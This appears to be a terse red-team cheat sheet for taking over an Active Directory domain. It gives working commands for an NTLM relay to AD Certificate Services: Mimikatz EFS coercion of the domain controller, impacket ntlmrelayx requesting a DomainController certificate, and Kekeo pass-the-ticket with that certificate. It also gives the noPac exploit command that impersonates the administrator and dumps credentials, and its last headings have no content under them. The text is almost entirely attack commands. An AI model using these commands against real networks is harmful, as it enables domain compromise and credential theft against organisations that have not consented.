Domain Exploitation

NTLM Replay

Mimikatz

Trigger the DC's authentication and catch it on the relay host (replace localIP with the listener's address):

Misc::efs /server:red-win2016-dc.rednet.local /noauth /connect:localIP

impacket

ntlmrelayx.py -debug -smb2support --target http://red-win2016-dc.rednet.local/certsrv/certfnsh.asp --adcs --template DomainController

Kekeo

Turn base64 input on and paste the certificate that impacket printed in place of CERT:

Base64 /input:on
Tgt:ask /pfx:CERT /user:host$ /domain:rednet.local /ptt

NoPac / SamTheAdmin:

git clone https://github.com/Ridter/noPac

python3 noPac.py DOMAIN/USER:'PASSWORD' -dc-ip 10.10.1.11 -dc-host V-DC --impersonate administrator -dump -use-ldap

PrintNightmare

Registry keys

Mimikatz
